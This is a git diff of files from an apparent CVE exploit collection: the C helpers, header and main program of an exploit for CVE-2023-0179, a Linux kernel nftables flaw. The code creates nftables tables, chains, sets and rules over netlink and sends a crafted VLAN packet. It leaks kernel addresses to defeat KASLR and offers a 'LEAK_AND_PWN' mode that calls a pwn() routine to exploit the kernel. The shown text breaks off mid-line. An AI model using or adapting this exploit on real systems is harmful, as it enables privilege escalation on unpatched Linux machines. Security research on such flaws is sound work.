NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1 -#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1 - -void rule_add_bit_shift( - struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, - uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len) -{ - - if(bitwise_len > 0xff) { - puts("bitwise_len > 0xff"); - exit(EXIT_FAILURE); - } - - struct nftnl_expr* e; - e = nftnl_expr_alloc("bitwise"); - - nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg); - nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg); - nftnl_expr_set_u32(e, NFTA_BITWISE_OP, shift_type); - nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len); - nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg) -{ - uint32_t data = 0; - rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data)); -} - -void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) -{ - struct nftnl_expr *expr = nftnl_expr_alloc("dynset"); - nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data); - nftnl_rule_add_expr(r, expr); -} - -void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) -{ - struct nftnl_expr *expr = nftnl_expr_alloc("lookup"); - nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data); - nftnl_rule_add_expr(r, expr); -} - -void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("payload"); - - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("cmp"); - - nftnl_expr_set_u32(e, NFTA_CMP_OP, op); - nftnl_expr_set_u32(e, NFTA_CMP_SREG, sreg); - nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len) -{ - struct nftnl_expr* e; - - e = nftnl_expr_alloc("immediate"); - - nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg); - nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("immediate"); - - // dreg = 0 -> verdict - nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); - nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict); - if (verdict == NFT_GOTO || verdict == NFT_JUMP) { - nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name); - } - - nftnl_rule_add_expr(r, e); -} - -int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_table* t = build_table(name, family); - - return send_batch_request( - nl, - NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8), - NLM_F_CREATE, family, (void**)&t, seq, - result_handler - ); -} - -int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_set* s = build_set(table_name, name, family); - - return send_batch_request( - nl, - NFT_MSG_NEWSET, - NLM_F_CREATE, family, (void**)&s, seq, - result_handler - ); -} - -int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param); - - return send_batch_request( - nl, - NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8), - NLM_F_CREATE, family, (void**)&c, seq, - result_handler - ); -} - -int send_packet() -{ - int sockfd; - struct sockaddr_in addr; - char buffer[] = "This is a test message"; - char *interface_name = "vlan.10"; // double-tagged packet - int interface_index; - struct ifreq ifr; - memset(&ifr, 0, sizeof(ifr)); - memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name))); - - sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); - if (sockfd < 0) { - perror("[-] Error creating socket"); - return 1; - } - - // Set the SO_BINDTODEVICE socket option - if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) { - perror("[-] Error setting SO_BINDTODEVICE socket option"); - return 1; - } - - memset(&addr, 0, sizeof(addr)); - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = inet_addr("192.168.123.123"); // random destination - addr.sin_port = htons(1337); - - // Send the UDP packet - if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) { - perror("[-] Error sending UDP packet"); - return 1; - } - - close(sockfd); - return 0; +/* + * ---------------------------------------------------------------------------- + * "THE BEER-WARE LICENSE" (Revision 42): + * David Bouman (pql) wrote this file. As long as you retain this notice you + * can do whatever you want with this stuff. If we meet some day, and you think + * this stuff is worth it, you can buy me a beer in return. Signed, David. + * ---------------------------------------------------------------------------- + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "helpers.h" + +unsigned long read_from_file(int line) { + int fd; + char buf[20]; + unsigned long result; + char *endptr; + + fd = open("reg.log", O_RDONLY); + if (fd == -1) { + perror("open"); + exit(1); + } + + if (read(fd, buf, sizeof(buf)) == -1) { + perror("read"); + close(fd); + exit(1); + } + + if (line == 1 && read(fd, buf, sizeof(buf)) == -1) { + perror("read"); + close(fd); + exit(1); + } + + result = strtoul(buf, &endptr, 16); + if (result == ULONG_MAX && endptr == buf) { + fprintf(stderr, "strtoul: invalid argument\n"); + close(fd); + exit(1); + } + close(fd); + return result; +} + +static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq) +{ + char buf[MNL_SOCKET_BUFFER_SIZE]; + + int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL); + if (ret <= 0) break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + return ret; +} + +int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf); + uint8_t msg_type = msg & 0xff; + uint8_t nft_type = (msg >> 8) & 0xff; + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); + int table_seq = *seq; + struct nlmsghdr* nlh; + + if (result_handler == NULL) { + result_handler = default_batch_req_handler; + } + + if (msg == NFT_MSG_NEWSET) { + nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + msg_flags | NLM_F_ACK, (*seq)++); + } else { + nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + msg_type, family, + msg_flags | NLM_F_ACK, (*seq)++ + ); + } + if (msg == NFT_MSG_NEWSET) { + nftnl_set_nlmsg_build_payload(nlh, *object); + nftnl_set_free(*object); + } else { + switch(nft_type) { + case NFT_TYPE_TABLE: + nftnl_table_nlmsg_build_payload(nlh, *object); + nftnl_table_free(*object); + break; + case NFT_TYPE_CHAIN: + nftnl_chain_nlmsg_build_payload(nlh, *object); + nftnl_chain_free(*object); + break; + case NFT_TYPE_RULE: + nftnl_rule_nlmsg_build_payload(nlh, *object); + // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2)); + nftnl_rule_free(*object); + break; + default: + return -1; + } + } + + *object = NULL; + + mnl_nlmsg_batch_next(batch); + nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); + + int ret = mnl_socket_sendto( + nl, + mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch) + ); + + if (ret < 0) { + perror("mnl_socket_send"); + return -1; + } + + int portid = mnl_socket_get_portid(nl); + + mnl_nlmsg_batch_stop(batch); + + result_handler(nl, portid, table_seq); +} + +struct nftnl_table* build_table(char* name, uint16_t family) +{ + struct nftnl_table* t = nftnl_table_alloc(); + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + return t; +} + +struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param) +{ + struct nftnl_chain* c; + + c = nftnl_chain_alloc(); + + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name); + if (dev_name) + nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); + + if (base_param) { + nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num); + nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio); + } + + return c; +} + +struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle) +{ + struct nftnl_rule* r = NULL; + uint8_t proto; + + r = nftnl_rule_alloc(); + + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); + + if (handle) { + nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle); + } + + return r; +} + +struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family) +{ + // Create a new set object + struct nftnl_set *set = nftnl_set_alloc(); + + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP); + nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4); + nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4); + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_u32(set, NFTNL_SET_ID, 1); + + //nftnl_set_add_expr(set, expr); + return set; +} + +#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1 +#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1 + +void rule_add_bit_shift( + struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, + uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len) +{ + + if(bitwise_len > 0xff) { + puts("bitwise_len > 0xff"); + exit(EXIT_FAILURE); + } + + struct nftnl_expr* e; + e = nftnl_expr_alloc("bitwise"); + + nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg); + nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg); + nftnl_expr_set_u32(e, NFTA_BITWISE_OP, shift_type); + nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len); + nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg) +{ + uint32_t data = 0; + rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data)); +} + +void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) +{ + struct nftnl_expr *expr = nftnl_expr_alloc("dynset"); + nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data); + nftnl_rule_add_expr(r, expr); +} + +void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) +{ + struct nftnl_expr *expr = nftnl_expr_alloc("lookup"); + nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data); + nftnl_rule_add_expr(r, expr); +} + +void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("payload"); + + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("cmp"); + + nftnl_expr_set_u32(e, NFTA_CMP_OP, op); + nftnl_expr_set_u32(e, NFTA_CMP_SREG, sreg); + nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len) +{ + struct nftnl_expr* e; + + e = nftnl_expr_alloc("immediate"); + + nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg); + nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("immediate"); + + // dreg = 0 -> verdict + nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict); + if (verdict == NFT_GOTO || verdict == NFT_JUMP) { + nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name); + } + + nftnl_rule_add_expr(r, e); +} + +int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_table* t = build_table(name, family); + + return send_batch_request( + nl, + NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8), + NLM_F_CREATE, family, (void**)&t, seq, + result_handler + ); +} + +int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_set* s = build_set(table_name, name, family); + + return send_batch_request( + nl, + NFT_MSG_NEWSET, + NLM_F_CREATE, family, (void**)&s, seq, + result_handler + ); +} + +int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param); + + return send_batch_request( + nl, + NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8), + NLM_F_CREATE, family, (void**)&c, seq, + result_handler + ); +} + +int send_packet() +{ + int sockfd; + struct sockaddr_in addr; + char buffer[] = "This is a test message"; + char *interface_name = "vlan.10"; // double-tagged packet + int interface_index; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name))); + + sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if (sockfd < 0) { + perror("[-] Error creating socket"); + return 1; + } + + // Set the SO_BINDTODEVICE socket option + if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) { + perror("[-] Error setting SO_BINDTODEVICE socket option"); + return 1; + } + + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("192.168.123.123"); // random destination + addr.sin_port = htons(1337); + + // Send the UDP packet + if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) { + perror("[-] Error sending UDP packet"); + return 1; + } + + close(sockfd); + return 0; } \ No newline at end of file diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h index f62b1c1d42638d786230b9c8eb2f6e52c83d2339..54ad08deabc69db447581f370a7bf54f6e99c929 100644 --- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h +++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h @@ -1,60 +1,60 @@ -/* - * ---------------------------------------------------------------------------- - * "THE BEER-WARE LICENSE" (Revision 42): - * David Bouman (pql) wrote this file. As long as you retain this notice you - * can do whatever you want with this stuff. If we meet some day, and you think - * this stuff is worth it, you can buy me a beer in return. Signed, David. - * ---------------------------------------------------------------------------- - */ - -#pragma once -#include -#define MIN(a, b) ((a) < (b) ? (a) : (b)) -#define VLAN_HLEN 4 -#define VLAN_ETH_HLEN 18 - -enum nft_types { - NFT_TYPE_TABLE = 0, - NFT_TYPE_CHAIN, - NFT_TYPE_RULE, - NFT_TYPE_SET -}; - -enum mode { - LEAK_ONLY = 1, - LEAK_AND_PWN -}; - -struct unft_base_chain_param { - uint32_t hook_num; - uint32_t prio; -}; - -// build helpers -struct nftnl_table* build_table(char* name, uint16_t family); -struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param); -struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle); -struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family); - -// create helpers (actually commits to the kernel) -int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int)); - -int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)); -int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)); -int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)); - -// expression helpers -void rule_add_bit_shift( - struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, - uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len); -void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg); -void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg); -void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len); -void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len); -void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data); -void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data); -void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len); -void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name); - -int send_packet(); +/* + * ---------------------------------------------------------------------------- + * "THE BEER-WARE LICENSE" (Revision 42): + * David Bouman (pql) wrote this file. As long as you retain this notice you + * can do whatever you want with this stuff. If we meet some day, and you think + * this stuff is worth it, you can buy me a beer in return. Signed, David. + * ---------------------------------------------------------------------------- + */ + +#pragma once +#include +#define MIN(a, b) ((a) < (b) ? (a) : (b)) +#define VLAN_HLEN 4 +#define VLAN_ETH_HLEN 18 + +enum nft_types { + NFT_TYPE_TABLE = 0, + NFT_TYPE_CHAIN, + NFT_TYPE_RULE, + NFT_TYPE_SET +}; + +enum mode { + LEAK_ONLY = 1, + LEAK_AND_PWN +}; + +struct unft_base_chain_param { + uint32_t hook_num; + uint32_t prio; +}; + +// build helpers +struct nftnl_table* build_table(char* name, uint16_t family); +struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param); +struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle); +struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family); + +// create helpers (actually commits to the kernel) +int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int)); + +int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)); +int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)); +int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)); + +// expression helpers +void rule_add_bit_shift( + struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, + uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len); +void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg); +void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg); +void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len); +void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len); +void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data); +void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data); +void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len); +void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name); + +int send_packet(); unsigned long read_from_file(int line); \ No newline at end of file diff --git a/cve/linux-kernel/2023/CVE-2023-0179/needle.c b/cve/linux-kernel/2023/CVE-2023-0179/needle.c index ddf91334903d64dcad5b54d09385b7d5e1566a30..c1e775120172d9525735c891aa3cf628001727bd 100644 --- a/cve/linux-kernel/2023/CVE-2023-0179/needle.c +++ b/cve/linux-kernel/2023/CVE-2023-0179/needle.c @@ -1,141 +1,141 @@ -#define _GNU_SOURCE 1 -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include "helpers.h" -#include "exploit.h" - -int main(int argc, char** argv, char** envp) -{ - // Use unique thread stack - cpu_set_t set; - CPU_ZERO(&set); - CPU_SET(0, &set); - sched_setaffinity(getpid(), sizeof(cpu_set_t), &set); - - enum mode choice; - - // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c - if (argc < 2) { - puts("[+] Dropping into network namespace"); - - char* new_argv[] = { - "/usr/bin/unshare", - "-Urn", - argv[0], - "EXPLOIT", - NULL - }; - - execve(new_argv[0], new_argv, envp); - puts("Couldn't start unshare wrapper.."); - puts("Recompile the exploit with an appropriate unshare path."); - exit(EXIT_FAILURE); - } - if (strcmp("EXPLOIT", argv[1])) { - puts("[-] Something went wrong..."); - exit(EXIT_FAILURE); - } - - puts("Choose an option:"); - puts(" 1. Leak kernel TEXT address and regs address"); - puts(" 2. Run the exploit"); - - scanf("%d", (int *) &choice); - - char *table_name = "mytable", - *base_chain_name = "base_chain", - *exploit_chain_name = "exploit_chain", - *set_name = "myset12", - *dev_name = "eth0"; - - puts("[+] Setting up the network namespace environment"); - system("./setup.sh"); - - struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); - if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { - perror("[-] mnl_socket_bind"); - puts("[-] Check your CAP_NET_ADMIN capability"); - exit(EXIT_FAILURE); - } - - // Wait for local traffic to cool down - sleep(5); - - int seq = time(NULL); - if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) { - perror("[-] Failed creating table"); - exit(EXIT_FAILURE); - } - printf("[+] Created table %s\n", table_name); - - struct unft_base_chain_param bp; - // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work - bp.hook_num = NF_NETDEV_INGRESS; - bp.prio = INT_MIN; - if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) { - perror("[-] Failed creating base chain"); - exit(EXIT_FAILURE); - } - printf("[+] Created base chain %s\n", base_chain_name); - - if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) { - perror("[-] Failed creating exploit chain"); - exit(EXIT_FAILURE); - } - printf("[+] Created exploit chain %s\n", base_chain_name); - - if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) { - perror("[-] Failed creating set"); - exit(EXIT_FAILURE); - } - printf("[+] Created exploit set\n"); - - if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) { - perror("[-] Failed creating base chain rule"); - exit(EXIT_FAILURE); - } - printf("[+] Created base chain rule\n"); - - uint8_t offset = 19, len = 4, vlan_hlen = 4; - uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen; - unsigned long found_addr; - unsigned long found_instr; - if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) { - perror("[-] Failed creating base chain rule"); - return EXIT_FAILURE; - } - printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen); - puts("[+] Successfully created exploit chain rule!"); - if (send_packet() == 0) { - system("nft list map netdev mytable myset12 | ./run.sh > reg.log"); - found_addr = read_from_file(0); - found_instr = read_from_file(1); - printf("[+] Found regs address: 0x%lx\n", found_addr); - printf("[+] Found instr address: 0x%lx\n", found_instr); - printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE); - system("nft delete table netdev mytable"); - } - - if (choice == LEAK_AND_PWN) { - printf("[+] Inserting the needle into address 0x%lx\n", found_addr); - sleep(5); - return pwn(nl, found_addr, found_instr); - } - return EXIT_SUCCESS; -} +#define _GNU_SOURCE 1 +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "helpers.h" +#include "exploit.h" + +int main(int argc, char** argv, char** envp) +{ + // Use unique thread stack + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(0, &set); + sched_setaffinity(getpid(), sizeof(cpu_set_t), &set); + + enum mode choice; + + // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c + if (argc < 2) { + puts("[+] Dropping into network namespace"); + + char* new_argv[] = { + "/usr/bin/unshare", + "-Urn", + argv[0], + "EXPLOIT", + NULL + }; + + execve(new_argv[0], new_argv, envp); + puts("Couldn't start unshare wrapper.."); + puts("Recompile the exploit with an appropriate unshare path."); + exit(EXIT_FAILURE); + } + if (strcmp("EXPLOIT", argv[1])) { + puts("[-] Something went wrong..."); + exit(EXIT_FAILURE); + } + + puts("Choose an option:"); + puts(" 1. Leak kernel TEXT address and regs address"); + puts(" 2. Run the exploit"); + + scanf("%d", (int *) &choice); + + char *table_name = "mytable", + *base_chain_name = "base_chain", + *exploit_chain_name = "exploit_chain", + *set_name = "myset12", + *dev_name = "eth0"; + + puts("[+] Setting up the network namespace environment"); + system("./setup.sh"); + + struct 